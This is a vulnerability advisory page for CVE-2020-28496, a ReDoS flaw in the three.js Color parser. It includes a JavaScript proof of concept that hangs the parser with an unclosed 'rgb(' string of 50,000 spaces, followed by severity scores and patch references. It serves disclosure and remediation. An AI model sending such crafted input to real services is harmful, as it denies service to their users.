Vulnerability Details : CVE-2020-28496
This affects the package three before 0.125.0. The regular expression denial of service (ReDoS) can be triggered when handling rgb or hsl colors.

PoC:

```javascript
var three = require('three')

// Build a malformed colour string: "rgb(" followed by n spaces and no
// closing parenthesis. This is the input that exercises the slow regex
// path in Color.setStyle (see issue #21132).
function build_blank (n) {
  var ret = "rgb("
  for (var i = 0; i < n; i++) {
    ret += " "
  }
  return ret + "";
}

var Color = three.Color

// Time how long parsing the crafted string takes; on vulnerable versions
// the cost grows super-linearly with n.
var time = Date.now();
new Color(build_blank(50000))
var time_cost = Date.now() - time;
console.log(time_cost + " ms")
```
Products affected by CVE-2020-28496
- cpe:2.3:a:three_project:three:*:*:*:*:*:node.js:*:*
Exploit prediction scoring system (EPSS) score for CVE-2020-28496
0.32%: probability of exploitation activity in the next 30 days
EPSS Score History
~67% percentile: the proportion of vulnerabilities that are scored at or below this one
CVSS scores for CVE-2020-28496
Base Score | Base Severity | CVSS Vector | Exploitability Score | Impact Score | Score Source | First Seen
---|---|---|---|---|---|---
5.0 | MEDIUM | AV:N/AC:L/Au:N/C:N/I:N/A:P | 10.0 | 2.9 | NIST | 
7.5 | HIGH | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H | 3.9 | 3.6 | NIST | 
7.5 | HIGH | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H | 3.9 | 3.6 | Snyk | 
CWE ids for CVE-2020-28496
- The product does not properly control the allocation and maintenance of a limited resource, thereby enabling an actor to influence the amount of resources consumed, eventually leading to the exhaustion of available resources. Assigned by: nvd@nist.gov (Primary)
References for CVE-2020-28496
- https://github.com/mrdoob/three.js/issues/21132
  ReDoS in three · Issue #21132 · mrdoob/three.js · GitHub (Exploit; Issue Tracking; Third Party Advisory)
- https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSNPM-1065972
  Regular Expression Denial of Service (ReDoS) in org.webjars.npm:three | Snyk (Exploit; Third Party Advisory)
- https://snyk.io/vuln/SNYK-JS-THREE-1064931
  Regular Expression Denial of Service (ReDoS) in three | Snyk (Exploit; Third Party Advisory)
- https://github.com/mrdoob/three.js/pull/21143/commits/4a582355216b620176a291ff319d740e619d583e
  Color: Fix ReDoS in setStyle by yetingli · Pull Request #21143 · mrdoob/three.js · GitHub (Patch; Third Party Advisory)